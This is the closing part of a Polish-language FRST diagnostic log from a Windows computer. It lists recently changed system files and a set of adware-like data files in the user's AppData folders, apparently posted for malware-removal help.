2020-08-09 16:13 - 2020-04-14 09:20 - 000000989 _____ C:\Users\CZARNY\Desktop\Nowy dokument tekstowy.txt
2020-08-04 20:39 - 2020-04-27 09:27 - 505840059 _____ C:\Windows\MEMORY.DMP
2020-08-04 20:39 - 2019-06-18 08:43 - 000000000 ____D C:\Windows\Minidump
2020-07-30 18:25 - 2009-07-14 19:55 - 005240570 _____ C:\Windows\system32\perfh015.dat
2020-07-30 18:25 - 2009-07-14 19:55 - 001680996 _____ C:\Windows\system32\perfc015.dat
2020-07-30 18:25 - 2009-07-14 07:13 - 000006220 _____ C:\Windows\system32\PerfStringBackup.INI
2020-07-29 19:46 - 2020-04-07 10:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-07-22 18:53 - 2009-07-14 07:08 - 000032604 _____ C:\Windows\Tasks\SCHEDLGU.TXT
==================== Pliki w katalogu głównym wybranych folderów ========
2020-04-26 09:57 - 2020-04-26 09:57 - 000000000 ___SH () C:\Users\CZARNY\AppData\Roaming\container.dat
2019-11-20 22:08 - 2020-06-14 19:15 - 000000032 _____ () C:\Users\CZARNY\AppData\Roaming\msregsvv.dll
2020-08-11 11:04 - 2020-08-11 11:04 - 008614400 _____ () C:\Users\CZARNY\AppData\Local\agent.dat
2020-08-11 11:03 - 2020-08-11 11:04 - 000043520 _____ () C:\Users\CZARNY\AppData\Local\ApplicationHosting.dat
2020-08-11 11:04 - 2020-08-11 11:04 - 000071712 _____ () C:\Users\CZARNY\AppData\Local\Config.xml
2020-08-11 12:11 - 2020-08-11 12:11 - 000011856 _____ () C:\Users\CZARNY\AppData\Local\InstallationConfiguration.xml
2020-08-11 11:03 - 2020-08-11 11:03 - 000141312 _____ () C:\Users\CZARNY\AppData\Local\installer.dat
2020-08-11 11:03 - 2020-08-11 11:03 - 000067938 _____ () C:\Users\CZARNY\AppData\Local\LexiFresh.tst
2020-08-11 11:03 - 2020-08-11 11:04 - 000126464 _____ () C:\Users\CZARNY\AppData\Local\lobby.dat
2020-08-11 11:03 - 2020-08-11 11:04 - 000005568 _____ () C:\Users\CZARNY\AppData\Local\md.xml
2020-08-11 11:04 - 2020-08-11 11:04 - 000126464 _____ () C:\Users\CZARNY\AppData\Local\noah.dat
2020-08-11 11:04 - 2020-08-11 11:04 - 002174106 _____ () C:\Users\CZARNY\AppData\Local\Sansoft.tst
2020-08-11 11:04 - 2020-08-11 11:04 - 000067938 _____ () C:\Users\CZARNY\AppData\Local\UniLathome.tst
==================== SigCheck ============================
(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)
LastRegBack: 2020-02-27 14:55
==================== Koniec FRST.txt ========================